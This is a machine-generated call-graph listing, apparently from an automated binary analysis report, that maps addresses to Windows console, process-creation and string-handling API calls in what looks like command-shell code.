7ff7ab136c8a 18481 7ff7ab136c97 18480->18481 18484 7ff7ab133448 166 API calls 18480->18484 18481->18457 18483 7ff7ab123278 166 API calls 18483->18480 18484->18473 18486 7ff7ab149215 18485->18486 18487 7ff7ab1491e6 18485->18487 18488 7ff7ab1309f4 2 API calls 18486->18488 18489 7ff7ab1491ee fprintf 18487->18489 18490 7ff7ab14921a 18488->18490 18491 7ff7ab14920b 18489->18491 18492 7ff7ab12b900 166 API calls 18490->18492 18491->18457 18493 7ff7ab149222 18492->18493 18493->18491 18494 7ff7ab14922a wcsrchr 18493->18494 18496 7ff7ab149243 18494->18496 18495 7ff7ab1492bf 18497 7ff7ab123278 166 API calls 18495->18497 18499 7ff7ab1492d6 18495->18499 18496->18495 18498 7ff7ab14927c _wcsnicmp 18496->18498 18501 7ff7ab133448 166 API calls 18496->18501 18497->18499 18498->18496 18500 7ff7ab12ff70 2 API calls 18499->18500 18500->18491 18501->18496 18503 7ff7ab12b900 166 API calls 18502->18503 18504 7ff7ab14942d 18503->18504 18537 7ff7ab149631 18504->18537 18659 7ff7ab1333a8 18504->18659 18506 7ff7ab138f80 7 API calls 18508 7ff7ab149659 18506->18508 18508->18457 18509 7ff7ab123278 166 API calls 18509->18537 18510 7ff7ab14947a wcschr 18511 7ff7ab14949b 18510->18511 18538 7ff7ab149638 18510->18538 18513 7ff7ab1333a8 iswspace 18511->18513 18512 7ff7ab1333a8 iswspace 18514 7ff7ab14945d wcsrchr 18512->18514 18516 7ff7ab1494a8 18513->18516 18514->18510 18515 7ff7ab149476 18514->18515 18515->18510 18517 7ff7ab1494d2 18516->18517 18518 7ff7ab1333a8 iswspace 18516->18518 18519 7ff7ab1494e0 GetStdHandle GetConsoleMode 18517->18519 18517->18538 18520 7ff7ab1494b9 wcsrchr 18518->18520 18521 7ff7ab14950c SetConsoleMode 18519->18521 18522 7ff7ab149525 GetStdHandle GetConsoleMode 18519->18522 18520->18517 18521->18522 18523 7ff7ab14956a 18522->18523 18524 7ff7ab149551 SetConsoleMode 18522->18524 18525 7ff7ab123240 166 API calls 18523->18525 18524->18523 18526 7ff7ab14957c GetStdHandle 18525->18526 18527 7ff7ab148450 367 API calls 18526->18527 18528 7ff7ab1495ab 18527->18528 18529 7ff7ab1495da SetConsoleMode 18528->18529 18530 7ff7ab1495f1 18528->18530 18529->18530 18531 7ff7ab14960d 18530->18531 18532 7ff7ab1495f6 SetConsoleMode 18530->18532 18533 7ff7ab14961e 18531->18533 18534 7ff7ab149633 18531->18534 18531->18537 18532->18531 18536 7ff7ab13498c 8 API calls 18533->18536 18535 7ff7ab139158 7 API calls 18534->18535 18535->18538 18536->18537 18537->18506 18538->18509 18540 7ff7ab14912d 18539->18540 18543 7ff7ab149159 18539->18543 18541 7ff7ab149135 fprintf 18540->18541 18542 7ff7ab149152 18541->18542 18542->18449 18543->18542 18544 7ff7ab133448 166 API calls 18543->18544 18544->18543 18550 7ff7ab13684c 18545->18550 18547 7ff7ab13641f 18547->18480 18547->18483 18548 7ff7ab1363f3 18548->18547 18549 7ff7ab13684c 188 API calls 18548->18549 18549->18548 18551 7ff7ab136877 18550->18551 18553 7ff7ab136962 18551->18553 18568 7ff7ab136a28 18551->18568 18555 7ff7ab13f83b 18553->18555 18611 7ff7ab136120 18553->18611 18557 7ff7ab1369b7 wcschr 18557->18553 18558 7ff7ab1368dc 18557->18558 18558->18553 18559 7ff7ab1368f4 18558->18559 18560 7ff7ab13684c 187 API calls 18559->18560 18561 7ff7ab136913 18560->18561 18567 7ff7ab13695a 18561->18567 18577 7ff7ab135d20 18561->18577 18567->18548 18573 7ff7ab136a57 18568->18573 18569 7ff7ab1368a3 18569->18553 18569->18557 18569->18558 18570 7ff7ab136a70 iswdigit 18570->18569 18571 7ff7ab136a87 wcschr 18570->18571 18571->18569 18572 7ff7ab136aa6 wcschr 18571->18572 18572->18569 18574 7ff7ab136ac5 18572->18574 18573->18569 18573->18570 18574->18569 18575 7ff7ab136ad9 wcschr 18574->18575 18575->18569 18576 7ff7ab136af4 wcschr 18575->18576 18576->18569 18576->18574 18578 7ff7ab12cd90 166 API calls 18577->18578 18579 7ff7ab135d4e 18578->18579 18580 7ff7ab13f4d4 18579->18580 18582 7ff7ab135d5a 18579->18582 18581 7ff7ab123278 166 API calls 18580->18581 18583 7ff7ab13f4de 18581->18583 18617 7ff7ab133a90 18582->18617 18586 7ff7ab12ff70 2 API calls 18587 7ff7ab135d7e 18586->18587 18588 7ff7ab135d9a 18587->18588 18589 7ff7ab135d83 wcstol 18587->18589 18590 7ff7ab136b68 18588->18590 18589->18588 18593 7ff7ab136b73 18590->18593 18591 7ff7ab136941 18591->18567 18594 7ff7ab136068 18591->18594 18592 7ff7ab13f899 printf 18592->18591 18593->18591 18593->18592 18595 7ff7ab12cd90 166 API calls 18594->18595 18596 7ff7ab1360a5 18595->18596 18597 7ff7ab13f5dc 18596->18597 18598 7ff7ab1360b1 18596->18598 18599 7ff7ab123278 166 API calls 18597->18599 18601 7ff7ab1333f0 _vsnwprintf 18598->18601 18600 7ff7ab13f5e8 18599->18600 18602 7ff7ab13f5ee GetLastError 18600->18602 18603 7ff7ab1360d9 18601->18603 18604 7ff7ab13498c 8 API calls 18603->18604 18605 7ff7ab1360e6 18604->18605 18605->18602 18606 7ff7ab1360ee 18605->18606 18607 7ff7ab12ff70 2 API calls 18606->18607 18608 7ff7ab1360f6 18607->18608 18609 7ff7ab138f80 7 API calls 18608->18609 18610 7ff7ab136105 18609->18610 18610->18567 18629 7ff7ab1361c8 18611->18629 18613 7ff7ab1361c8 188 API calls 18614 7ff7ab136154 18613->18614 18614->18613 18615 7ff7ab136b68 printf 18614->18615 18616 7ff7ab136187 18614->18616 18615->18614 18616->18567 18618 7ff7ab133aa4 18617->18618 18619 7ff7ab133b73 18617->18619 18618->18619 18620 7ff7ab1309f4 2 API calls 18618->18620 18619->18586 18621 7ff7ab133ac8 18620->18621 18622 7ff7ab12b900 166 API calls 18621->18622 18623 7ff7ab133ad0 18622->18623 18624 7ff7ab133ad8 wcsrchr 18623->18624 18627 7ff7ab133af4 18623->18627 18624->18627 18625 7ff7ab133b66 18626 7ff7ab12ff70 2 API calls 18625->18626 18626->18619 18627->18625 18628 7ff7ab133b2d _wcsnicmp 18627->18628 18628->18627 18635 7ff7ab136270 18629->18635 18631 7ff7ab13622f 18631->18614 18632 7ff7ab136270 188 API calls 18633 7ff7ab1361fc 18632->18633 18633->18631 18633->18632 18634 7ff7ab136b68 printf 18633->18634 18634->18633 18641 7ff7ab136318 18635->18641 18637 7ff7ab1362d7 18637->18633 18638 7ff7ab136318 188 API calls 18639 7ff7ab1362a4 18638->18639 18639->18637 18639->18638 18640 7ff7ab136b68 printf 18639->18640 18640->18639 18647 7ff7ab136454 18641->18647 18643 7ff7ab136387 18643->18639 18644 7ff7ab136454 188 API calls 18645 7ff7ab13634c 18644->18645 18645->18643 18645->18644 18646 7ff7ab136b68 printf 18645->18646 18646->18645 18653 7ff7ab13653c 18647->18653 18649 7ff7ab1364bf 18649->18645 18650 7ff7ab13653c 188 API calls 18651 7ff7ab136488 18650->18651 18651->18649 18651->18650 18652 7ff7ab136b68 printf 18651->18652 18652->18651 18654 7ff7ab13662c 188 API calls 18653->18654 18657 7ff7ab136570 18654->18657 18655 7ff7ab1365af 18655->18651 18656 7ff7ab13662c 188 API calls 18656->18657 18657->18655 18657->18656 18658 7ff7ab136b68 printf 18657->18658 18658->18657 18660 7ff7ab1333b8 18659->18660 18661 7ff7ab1333bd iswspace 18660->18661 18662 7ff7ab1333d0 18660->18662 18661->18660 18661->18662 18662->18510 18662->18512 18662->18538 16779 7ff7ab138d80 16780 7ff7ab138da4 16779->16780 16781 7ff7ab138db6 16780->16781 16782 7ff7ab138dbf Sleep 16780->16782 16783 7ff7ab138ddb _amsg_exit 16781->16783 16785 7ff7ab138de7 16781->16785 16782->16780 16783->16785 16784 7ff7ab138e56 _initterm 16786 7ff7ab138e73 _IsNonwritableInCurrentImage 16784->16786 16785->16784 16785->16786 16791 7ff7ab138e3c 16785->16791 16793 7ff7ab1337d8 GetCurrentThreadId OpenThread 16786->16793 16826 7ff7ab1304f4 16793->16826 16795 7ff7ab133839 HeapSetInformation RegOpenKeyExW 16796 7ff7ab13e9f8 RegQueryValueExW RegCloseKey 16795->16796 16797 7ff7ab13388d 16795->16797 16799 7ff7ab13ea41 GetThreadLocale 16796->16799 16798 7ff7ab135920 VirtualQuery VirtualQuery 16797->16798 16800 7ff7ab1338ab GetConsoleOutputCP GetCPInfo 16798->16800 16808 7ff7ab133919 16799->16808 16800->16799 16801 7ff7ab1338f1 memset 16800->16801 16801->16808 16802 7ff7ab134d5c 391 API calls 16802->16808 16803 7ff7ab123240 166 API calls 16803->16808 16804 7ff7ab13eb27 _setjmp 16804->16808 16805 7ff7ab133948 _setjmp 16805->16808 16806 7ff7ab148530 370 API calls 16806->16808 16807 7ff7ab1301b8 6 API calls 16807->16808 16808->16796 16808->16802 16808->16803 16808->16804 16808->16805 16808->16806 16808->16807 16809 7ff7ab134c1c 166 API calls 16808->16809 16810 7ff7ab12df60 481 API calls 16808->16810 16811 7ff7ab13eb71 _setmode 16808->16811 16812 7ff7ab1386f0 182 API calls 16808->16812 16813 7ff7ab130580 12 API calls 16808->16813 16815 7ff7ab1358e4 EnterCriticalSection LeaveCriticalSection 16808->16815 16817 7ff7ab12be00 647 API calls 16808->16817 16818 7ff7ab1358e4 EnterCriticalSection LeaveCriticalSection 16808->16818 16809->16808 16810->16808 16811->16808 16812->16808 16814 7ff7ab13398b GetConsoleOutputCP GetCPInfo 16813->16814 16816 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16814->16816 16815->16808 16816->16808 16817->16808 16819 7ff7ab13ebbe GetConsoleOutputCP GetCPInfo 16818->16819 16820 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16819->16820 16821 7ff7ab13ebe6 16820->16821 16822 7ff7ab12be00 647 API calls 16821->16822 16823 7ff7ab130580 12 API calls 16821->16823 16822->16821 16824 7ff7ab13ebfc GetConsoleOutputCP GetCPInfo 16823->16824 16825 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16824->16825 16825->16808 16827 7ff7ab130504 16826->16827 16828 7ff7ab13051e GetModuleHandleW 16827->16828 16829 7ff7ab13054d GetProcAddress 16827->16829 16830 7ff7ab13056c SetThreadLocale 16827->16830 16828->16827 16829->16827 22025 7ff7ab12b8c0 22028 7ff7ab12be00 22025->22028 22029 7ff7ab12b8d4 22028->22029 22030 7ff7ab12be1b 22028->22030 22030->22029 22031 7ff7ab12be47 memset 22030->22031 22032 7ff7ab12be67 22030->22032 22135 7ff7ab12bff0 22031->22135 22033 7ff7ab12be73 22032->22033 22036 7ff7ab12bf29 22032->22036 22037 7ff7ab12beaf 22032->22037 22035 7ff7ab12be92 22033->22035 22039 7ff7ab12bf0c 22033->22039 22045 7ff7ab12bea1 22035->22045 22062 7ff7ab12c620 GetConsoleTitleW 22035->22062 22038 7ff7ab12cd90 166 API calls 22036->22038 22037->22029 22043 7ff7ab12bff0 185 API calls 22037->22043 22041 7ff7ab12bf33 22038->22041 22173 7ff7ab12b0d8 memset 22039->22173 22041->22037 22046 7ff7ab12bf70 22041->22046 22047 7ff7ab1288a8 _wcsicmp 22041->22047 22043->22029 22045->22037 22051 7ff7ab12af98 2 API calls 22045->22051 22058 7ff7ab12bf75 22046->22058 22233 7ff7ab1271ec 22046->22233 22050 7ff7ab12bf5a 22047->22050 22048 7ff7ab12bf1e 22048->22037 22050->22046 22053 7ff7ab130a6c 273 API calls 22050->22053 22051->22037 22052 7ff7ab12bfa9 22052->22037 22054 7ff7ab12cd90 166 API calls 22052->22054 22053->22046 22055 7ff7ab12bfbb 22054->22055 22055->22037 22056 7ff7ab13081c 166 API calls 22055->22056 22056->22058 22057 7ff7ab12b0d8 194 API calls 22059 7ff7ab12bf7f 22057->22059 22058->22057 22059->22037 22106 7ff7ab135ad8 22059->22106 22064 7ff7ab12c675 22062->22064 22068 7ff7ab12ca2f 22062->22068 22063 7ff7ab13c5fc GetLastError 22063->22068 22065 7ff7ab12ca40 17 API calls 22064->22065 22074 7ff7ab12c69b 22065->22074 22066 7ff7ab123278 166 API calls 22066->22068 22067 7ff7ab13855c ??_V@YAXPEAX 22067->22068 22068->22063 22068->22066 22068->22067 22069 7ff7ab12c9b5 22073 7ff7ab13855c ??_V@YAXPEAX 22069->22073 22070 7ff7ab1289c0 23 API calls 22098 7ff7ab12c964 22070->22098 22071 7ff7ab12c978 towupper 22071->22098 22072 7ff7ab13855c ??_V@YAXPEAX 22092 7ff7ab12c762 22072->22092 22093 7ff7ab12c855 22073->22093 22074->22068 22074->22069 22075 7ff7ab12d3f0 223 API calls 22074->22075 22074->22092 22078 7ff7ab12c741 22075->22078 22076 7ff7ab12c872 22081 7ff7ab13855c ??_V@YAXPEAX 22076->22081 22077 7ff7ab14ec14 173 API calls 22077->22092 22080 7ff7ab12c74d 22078->22080 22083 7ff7ab12c8b5 wcsncmp 22078->22083 22079 7ff7ab13c6b8 SetConsoleTitleW 22079->22076 22084 7ff7ab12bd38 207 API calls 22080->22084 22080->22092 22082 7ff7ab12c87c 22081->22082 22085 7ff7ab138f80 7 API calls 22082->22085 22083->22080 22083->22092 22084->22092 22087 7ff7ab12c88e 22085->22087 22086 7ff7ab12c83d 22239 7ff7ab12cb40 22086->22239 22087->22045 22089 7ff7ab12c78a wcschr 22089->22092 22091 7ff7ab13291c 8 API calls 22091->22092 22092->22068 22092->22072 22092->22086 22092->22089 22092->22091 22094 7ff7ab12ca25 22092->22094 22096 7ff7ab13c684 22092->22096 22092->22098 22100 7ff7ab12ca2a 22092->22100 22093->22076 22093->22079 22097 7ff7ab123278 166 API calls 22094->22097 22099 7ff7ab123278 166 API calls 22096->22099 22097->22068 22098->22063 22098->22069 22098->22070 22098->22071 22098->22077 22098->22092 22102 7ff7ab12ca16 GetLastError 22098->22102 22099->22068 22101 7ff7ab139158 7 API calls 22100->22101 22101->22068 22104 7ff7ab123278 166 API calls 22102->22104 22105 7ff7ab13c675 22104->22105 22105->22068 22107 7ff7ab12cd90 166 API calls 22106->22107 22108 7ff7ab135b12 22107->22108 22109 7ff7ab12cb40 166 API calls 22108->22109 22133 7ff7ab135b8b 22108->22133 22110 7ff7ab135b26 22109->22110 22113 7ff7ab130a6c 273 API calls 22110->22113 22110->22133 22111 7ff7ab138f80 7 API calls 22112 7ff7ab12bf99 22111->22112 22112->22045 22114 7ff7ab135b43 22113->22114 22115 7ff7ab135bb8 22114->22115 22116 7ff7ab135b48 GetConsoleTitleW 22114->22116 22117 7ff7ab135bbd GetConsoleTitleW 22115->22117 22118 7ff7ab135bf4 22115->22118 22119 7ff7ab12cad4 172 API calls 22116->22119 22120 7ff7ab12cad4 172 API calls 22117->22120 22121 7ff7ab135bfd 22118->22121 22122 7ff7ab13f452 22118->22122 22123 7ff7ab135b66 22119->22123 22124 7ff7ab135bdb 22120->22124 22128 7ff7ab135c1b 22121->22128 22129 7ff7ab13f462 22121->22129 22121->22133 22126 7ff7ab133c24 166 API calls 22122->22126 22255 7ff7ab134224 InitializeProcThreadAttributeList 22123->22255 22315 7ff7ab1296e8 22124->22315 22126->22133 22131 7ff7ab123278 166 API calls 22128->22131 22132 7ff7ab123278 166 API calls 22129->22132 22130 7ff7ab135b7f 22134 7ff7ab135c3c SetConsoleTitleW 22130->22134 22131->22133 22132->22133 22133->22111 22134->22133 22136 7ff7ab12c0c4 22135->22136 22137 7ff7ab12c01c 22135->22137 22136->22032 22138 7ff7ab12c022 22137->22138 22139 7ff7ab12c086 22137->22139 22140 7ff7ab12c030 22138->22140 22141 7ff7ab12c113 22138->22141 22143 7ff7ab12c144 22139->22143 22154 7ff7ab12c094 22139->22154 22142 7ff7ab12c039 wcschr 22140->22142 22156 7ff7ab12c053 22140->22156 22152 7ff7ab12ff70 2 API calls 22141->22152 22141->22156 22145 7ff7ab12c301 22142->22145 22142->22156 22144 7ff7ab12c151 22143->22144 22162 7ff7ab12c1c8 22143->22162 22521 7ff7ab12c460 22144->22521 22151 7ff7ab12cd90 166 API calls 22145->22151 22146 7ff7ab12c058 22157 7ff7ab12ff70 2 API calls 22146->22157 22160 7ff7ab12c073 22146->22160 22147 7ff7ab12c0c6 22150 7ff7ab12c0cf wcschr 22147->22150 22147->22160 22149 7ff7ab12c460 183 API calls 22149->22154 22155 7ff7ab12c1be 22150->22155 22150->22160 22172 7ff7ab12c30b 22151->22172 22152->22156 22154->22136 22154->22149 22158 7ff7ab12cd90 166 API calls 22155->22158 22156->22146 22156->22147 22164 7ff7ab12c211 22156->22164 22157->22160 22158->22162 22159 7ff7ab12c460 183 API calls 22159->22136 22160->22136 22161 7ff7ab12c460 183 API calls 22160->22161 22161->22160 22162->22136 22163 7ff7ab12c285 22162->22163 22162->22164 22169 7ff7ab12d840 178 API calls 22162->22169 22163->22164 22168 7ff7ab12b6b0 170 API calls 22163->22168 22167 7ff7ab12ff70 2 API calls 22164->22167 22165 7ff7ab12b6b0 170 API calls 22165->22156 22166 7ff7ab12d840 178 API calls 22166->22172 22167->22136 22170 7ff7ab12c2ac 22168->22170 22169->22162 22170->22160 22170->22164 22171 7ff7ab12c3d4 22171->22160 22171->22164 22171->22165 22172->22136 22172->22164 22172->22166 22172->22171 22174 7ff7ab12ca40 17 API calls 22173->22174 22190 7ff7ab12b162 22174->22190 22175 7ff7ab12b2e1 22177 7ff7ab12b2f7 ??_V@YAXPEAX 22175->22177 22178 7ff7ab12b303 22175->22178 22176 7ff7ab12b1d9 22181 7ff7ab12cd90 166 API calls 22176->22181 22198 7ff7ab12b1ed 22176->22198 22177->22178 22180 7ff7ab138f80 7 API calls 22178->22180 22179 7ff7ab131ea0 8 API calls 22179->22190 22182 7ff7ab12b315 22180->22182 22181->22198 22182->22035 22182->22048 22184 7ff7ab12b228 _get_osfhandle 22186 7ff7ab12b23f _get_osfhandle 22184->22186 22184->22198 22185 7ff7ab13bfef _get_osfhandle SetFilePointer 22187 7ff7ab13c01d 22185->22187 22185->22198 22186->22198 22189 7ff7ab1333f0 _vsnwprintf 22187->22189 22192 7ff7ab13c038 22189->22192 22190->22175 22190->22176 22190->22179 22190->22190 22191 7ff7ab1301b8 6 API calls 22191->22198 22197 7ff7ab123278 166 API calls 22192->22197 22193 7ff7ab13c1c3 22194 7ff7ab1333f0 _vsnwprintf 22193->22194 22194->22192 22195 7ff7ab12d208 _close 22195->22198 22196 7ff7ab1326e0 19 API calls 22196->22198 22200 7ff7ab13c1f9 22197->22200 22198->22175 22198->22184 22198->22185 22198->22191 22198->22193 22198->22195 22198->22196 22199 7ff7ab13c060 22198->22199 22201 7ff7ab13c246 22198->22201 22203 7ff7ab12b038 _dup2 22198->22203 22208 7ff7ab12b356 22198->22208 22232 7ff7ab13c1a5 22198->22232 22535 7ff7ab12affc _dup 22198->22535 22537 7ff7ab14f318 _get_osfhandle GetFileType 22198->22537 22199->22201 22204 7ff7ab1309f4 2 API calls 22199->22204 22202 7ff7ab12af98 2 API calls 22200->22202 22205 7ff7ab12af98 2 API calls 22201->22205 22202->22175 22203->22198 22209 7ff7ab13c084 22204->22209 22210 7ff7ab13c24b 22205->22210 22206 7ff7ab12b038 _dup2 22207 7ff7ab13c1b7 22206->22207 22211 7ff7ab13c207 22207->22211 22212 7ff7ab13c1be 22207->22212 22215 7ff7ab12af98 2 API calls 22208->22215 22213 7ff7ab12b900 166 API calls 22209->22213 22214 7ff7ab14f1d8 166 API calls 22210->22214 22218 7ff7ab12d208 _close 22211->22218 22216 7ff7ab12d208 _close 22212->22216 22217 7ff7ab13c08c 22213->22217 22214->22175 22219 7ff7ab13c211 22215->22219 22216->22193 22220 7ff7ab13c094 wcsrchr 22217->22220 22224 7ff7ab13c0ad 22217->22224 22218->22208 22221 7ff7ab1333f0 _vsnwprintf 22219->22221 22220->22224 22222 7ff7ab13c22c 22221->22222 22223 7ff7ab123278 166 API calls 22222->22223 22223->22175 22224->22224 22226 7ff7ab13c0e0 _wcsnicmp 22224->22226 22228 7ff7ab13c106 22224->22228 22225 7ff7ab12ff70 2 API calls 22227 7ff7ab13c13b 22225->22227 22226->22224 22227->22201 22229 7ff7ab13c146 SearchPathW 22227->22229 22228->22225 22229->22201 22230 7ff7ab13c188 22229->22230 22231 7ff7ab1326e0 19 API calls 22230->22231 22231->22232 22232->22206 22234 7ff7ab127279 22233->22234 22235 7ff7ab127211 _setjmp 22233->22235 22234->22052 22235->22234 22237 7ff7ab127265 22235->22237 22538 7ff7ab1272b0 22237->22538 22240 7ff7ab12cb63 22239->22240 22241 7ff7ab12cd90 166 API calls 22240->22241 22242 7ff7ab12c848 22241->22242 22242->22093 22243 7ff7ab12cad4 22242->22243 22244 7ff7ab12cb05 22243->22244 22245 7ff7ab12cad9 22243->22245 22244->22093 22245->22244 22246 7ff7ab12cd90 166 API calls 22245->22246 22247 7ff7ab13c722 22246->22247 22247->22244 22248 7ff7ab13c72e GetConsoleTitleW 22247->22248 22248->22244 22249 7ff7ab13c74a 22248->22249 22250 7ff7ab12b6b0 170 API calls 22249->22250 22254 7ff7ab13c778 22250->22254 22251 7ff7ab13c7ec 22252 7ff7ab12ff70 2 API calls 22251->22252 22252->22244 22253 7ff7ab13c7dd SetConsoleTitleW 22253->22251 22254->22251 22254->22253 22256 7ff7ab1342ab UpdateProcThreadAttribute 22255->22256 22257 7ff7ab13ecd4 GetLastError 22255->22257 22259 7ff7ab1342eb memset memset GetStartupInfoW 22256->22259 22260 7ff7ab13ecf0 GetLastError 22256->22260 22258 7ff7ab13ecee 22257->22258 22262 7ff7ab133a90 170 API calls 22259->22262 22352 7ff7ab149eec 22260->22352 22264 7ff7ab1343a8 22262->22264 22265 7ff7ab12b900 166 API calls 22264->22265 22266 7ff7ab1343bb 22265->22266 22267 7ff7ab134638 _local_unwind 22266->22267 22268 7ff7ab1343cc 22266->22268 22267->22268 22269 7ff7ab1343de wcsrchr 22268->22269 22270 7ff7ab134415 22268->22270 22269->22270 22272 7ff7ab1343f7 lstrcmpW 22269->22272 22339 7ff7ab135a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22270->22339 22272->22270 22274 7ff7ab134668 22272->22274 22273 7ff7ab13441a 22275 7ff7ab13442a CreateProcessW 22273->22275 22278 7ff7ab134596 CreateProcessAsUserW 22273->22278 22340 7ff7ab149044 22274->22340 22277 7ff7ab13448b 22275->22277 22279 7ff7ab134672 GetLastError 22277->22279 22280 7ff7ab134495 CloseHandle 22277->22280 22278->22277 22288 7ff7ab13468d 22279->22288 22281 7ff7ab13498c 8 API calls 22280->22281 22282 7ff7ab1344c5 22281->22282 22287 7ff7ab1344cd 22282->22287 22282->22288 22283 7ff7ab1347a3 22283->22130 22284 7ff7ab1344f8 22284->22283 22286 7ff7ab134612 22284->22286 22290 7ff7ab135cb4 7 API calls 22284->22290 22285 7ff7ab12cd90 166 API calls 22289 7ff7ab134724 22285->22289 22291 7ff7ab13461c 22286->22291 22293 7ff7ab1347e1 CloseHandle 22286->22293 22287->22283 22287->22284 22303 7ff7ab14a250 33 API calls 22287->22303 22288->22285 22288->22287 22292 7ff7ab13472c _local_unwind 22289->22292 22299 7ff7ab13473d 22289->22299 22294 7ff7ab134517 22290->22294 22295 7ff7ab12ff70 GetProcessHeap RtlFreeHeap 22291->22295 22292->22299 22293->22291 22296 7ff7ab1333f0 _vsnwprintf 22294->22296 22297 7ff7ab1347fa DeleteProcThreadAttributeList 22295->22297 22298 7ff7ab134544 22296->22298 22300 7ff7ab138f80 7 API calls 22297->22300 22301 7ff7ab13498c 8 API calls 22298->22301 22307 7ff7ab12ff70 GetProcessHeap RtlFreeHeap 22299->22307 22304 7ff7ab134820 22300->22304 22302 7ff7ab134558 22301->22302 22305 7ff7ab1347ae 22302->22305 22306 7ff7ab134564 22302->22306 22303->22284 22304->22130 22309 7ff7ab1333f0 _vsnwprintf 22305->22309 22308 7ff7ab13498c 8 API calls 22306->22308 22310 7ff7ab13475b _local_unwind 22307->22310 22311 7ff7ab134577 22308->22311 22309->22286 22310->22287 22311->22291 22312 7ff7ab13457f 22311->22312 22313 7ff7ab14a920 210 API calls 22312->22313 22314 7ff7ab134584 22313->22314 22314->22291 22319 7ff7ab129737 22315->22319 22317 7ff7ab12977d memset 22320 7ff7ab12ca40 17 API calls 22317->22320 22318 7ff7ab12cd90 166 API calls 22318->22319 22319->22317 22319->22318 22321 7ff7ab13b76e 22319->22321 22322 7ff7ab13b7b3 22319->22322 22324 7ff7ab12b364 17 API calls 22319->22324 22331 7ff7ab13b79a 22319->22331 22333 7ff7ab12986d 22319->22333 22334 7ff7ab1296b4 186 API calls 22319->22334 22354 7ff7ab131fac memset 22319->22354 22381 7ff7ab12ce10 22319->22381 22431 7ff7ab135920 22319->22431 22320->22319 22323 7ff7ab123278 166 API calls 22321->22323 22326 7ff7ab13b787 22323->22326 22324->22319 22325 7ff7ab13855c ??_V@YAXPEAX 22325->22322 22327 7ff7ab13b795 22326->22327 22329 7ff7ab14e944 393 API calls 22326->22329 22437 7ff7ab147694 22327->22437 22329->22327 22331->22325 22335 7ff7ab12988c 22333->22335 22336 7ff7ab129880 ??_V@YAXPEAX 22333->22336 22334->22319 22337 7ff7ab138f80 7 API calls 22335->22337 22336->22335 22338 7ff7ab12989d 22337->22338 22338->22130 22341 7ff7ab133a90 170 API calls 22340->22341 22342 7ff7ab149064 22341->22342 22343 7ff7ab14906e 22342->22343 22344 7ff7ab149083 22342->22344 22345 7ff7ab13498c 8 API calls 22343->22345 22347 7ff7ab12cd90 166 API calls 22344->22347 22346 7ff7ab149081 22345->22346 22346->22270 22348 7ff7ab14909b 22347->22348 22348->22346 22349 7ff7ab13498c 8 API calls 22348->22349 22350 7ff7ab1490ec 22349->22350 22351 7ff7ab12ff70 2 API calls 22350->22351 22351->22346 22353 7ff7ab13ed0a DeleteProcThreadAttributeList 22352->22353 22353->22258 22355 7ff7ab13203b 22354->22355 22356 7ff7ab1320b0 22355->22356 22357 7ff7ab132094 22355->22357 22358 7ff7ab133060 171 API calls 22356->22358 22360 7ff7ab13211c 22356->22360 22359 7ff7ab1320a6 22357->22359 22361 7ff7ab123278 166 API calls 22357->22361 22358->22360 22362 7ff7ab138f80 7 API calls 22359->22362 22360->22359 22363 7ff7ab132e44 2 API calls 22360->22363 22361->22359 22364 7ff7ab132325 22362->22364 22365 7ff7ab132148 22363->22365 22364->22319 22365->22359 22366 7ff7ab132d70 3 API calls 22365->22366 22367 7ff7ab1321af 22366->22367 22368 7ff7ab12b900 166 API calls 22367->22368 22370 7ff7ab1321d0 22368->22370 22369 7ff7ab13e04a ??_V@YAXPEAX 22369->22359 22370->22369 22371 7ff7ab13221c wcsspn 22370->22371 22380 7ff7ab1322a4 ??_V@YAXPEAX 22370->22380 22373 7ff7ab12b900 166 API calls 22371->22373 22374 7ff7ab13223b 22373->22374 22374->22369 22377 7ff7ab132252 22374->22377 22375 7ff7ab12d3f0 223 API calls 22375->22380 22376 7ff7ab13e06d wcschr 22376->22377 22377->22376 22378 7ff7ab13e090 towupper 22377->22378 22379 7ff7ab13228f 22377->22379 22378->22377 22378->22379 22379->22375 22380->22359 22419 7ff7ab12d0f8 22381->22419 22425 7ff7ab12ce5b 22381->22425 22382 7ff7ab138f80 7 API calls 22384 7ff7ab12d10a 22382->22384 22383 7ff7ab13c860 22385 7ff7ab13c97c 22383->22385 22386 7ff7ab14ee88 390 API calls 22383->22386 22384->22319 22387 7ff7ab14e9b4 197 API calls 22385->22387 22389 7ff7ab13c879 22386->22389 22390 7ff7ab13c981 longjmp 22387->22390 22388 7ff7ab130494 182 API calls 22388->22425 22391 7ff7ab13c95c 22389->22391 22392 7ff7ab13c882 EnterCriticalSection LeaveCriticalSection 22389->22392 22393 7ff7ab13c99a 22390->22393 22391->22385 22398 7ff7ab1296b4 186 API calls 22391->22398 22397 7ff7ab12d0e3 22392->22397 22394 7ff7ab13c9b3 ??_V@YAXPEAX 22393->22394 22393->22419 22394->22419 22396 7ff7ab12ceaa _tell 22399 7ff7ab12d208 _close 22396->22399 22397->22319 22398->22391 22399->22425 22400 7ff7ab12cd90 166 API calls 22400->22425 22401 7ff7ab13c9d5 22402 7ff7ab14d610 167 API calls 22401->22402 22404 7ff7ab13c9da 22402->22404 22403 7ff7ab12b900 166 API calls 22403->22425 22405 7ff7ab13ca07 22404->22405 22407 7ff7ab14bfec 176 API calls 22404->22407 22406 7ff7ab14e91c 198 API calls 22405->22406 22411 7ff7ab13ca0c 22406->22411 22408 7ff7ab13c9f1 22407->22408 22410 7ff7ab123240 166 API calls 22408->22410 22409 7ff7ab12cf33 memset 22409->22425 22410->22405 22411->22319 22412 7ff7ab12ca40 17 API calls 22412->22425 22413 7ff7ab12d184 wcschr 22413->22425 22414 7ff7ab14bfec 176 API calls 22414->22425 22415 7ff7ab13c9c9 22417 7ff7ab13855c ??_V@YAXPEAX 22415->22417 22416 7ff7ab12d1a7 wcschr 22416->22425 22417->22419 22418 7ff7ab14778c 166 API calls 22418->22425 22419->22382 22420 7ff7ab130a6c 273 API calls 22420->22425 22421 7ff7ab12be00 635 API calls 22421->22425 22422 7ff7ab133448 166 API calls 22422->22425 22423 7ff7ab12cfab _wcsicmp 22423->22425 22424 7ff7ab130580 12 API calls 22426 7ff7ab12d003 GetConsoleOutputCP GetCPInfo 22424->22426 22425->22383 22425->22388 22425->22393 22425->22397 22425->22400 22425->22401 22425->22403 22425->22409 22425->22412 22425->22413 22425->22414 22425->22415 22425->22416 22425->22418 22425->22419 22425->22420 22425->22421 22425->22422 22425->22423 22425->22424 22429 